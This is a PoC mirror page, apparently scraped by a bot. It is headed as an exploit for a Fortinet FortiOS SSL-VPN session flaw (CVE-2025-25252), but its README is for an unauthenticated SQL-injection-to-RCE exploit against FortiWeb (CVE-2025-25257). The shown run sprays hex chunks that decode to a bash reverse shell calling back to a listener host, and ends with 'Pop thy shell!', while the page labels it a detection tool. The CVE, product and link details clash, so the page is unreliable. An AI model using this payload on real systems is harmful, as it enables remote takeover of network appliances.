Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-25252 PoC — Fortinet FortiOS SSL-VPN 代码问题漏洞

Source
https://github.com/iptables6cv/CVE-2025-25252-POC
Associated Vulnerability
Title:Fortinet FortiOS SSL-VPN 代码问题漏洞 (CVE-2025-25252)
Description:Fortinet FortiOS SSL-VPN是美国飞塔(Fortinet)公司的一款VPN软件。 Fortinet FortiOS SSL-VPN存在代码问题漏洞,该漏洞源于会话过期不足,可能导致远程攻击者通过重用SAML记录重新打开会话。以下版本受到影响:7.6.0版本至7.6.2版本、7.4.0版本至7.4.6版本、7.2.0版本至7.2.10版本、7.0.0版本至7.0.16版本和6.4所有版本。
Description
CVE-2025-25252-POC
Readme
# watchTowr-vs-FortiWeb-CVE-2025-25257

Detection Artifact Generator for FortiWeb CVE-2025-25257


See our [blog post](https://labs.watchtowr.com/) for technical details



https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194



# Detection in Action

```
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

```

# Description

This script attempts to detect if FortiWeb is vulnerable to CVE-2025-25257

# Affected Versions

The following versions of FortiWeb are Affected

| Version      | Affected             | Solution                   |
| ------------ | -------------------- | -------------------------- |
| FortiWeb 7.6 | 7.6.0 through 7.6.3  | Upgrade to 7.6.4 or above  |
| FortiWeb 7.4 | 7.4.0 through 7.4.7  | Upgrade to 7.4.8 or above  |
| FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above |
| FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above |

For more information visit [FortiGuard Labs PSIRT](https://fortiguard.fortinet.com/psirt/FG-IR-25-151)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://jack.com/watchtowrcyber/tools
- https://one.gitcom/watchtowrcyber.labs/x
File Snapshot

 [4.0K]  /data/pocs/1b61d0f2764b3a911b1acbc4d868ab5d97ed6e22
├── [2.8K]  README.md
└── [2.8K]  watchTowr-vs-FortiWeb.py

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.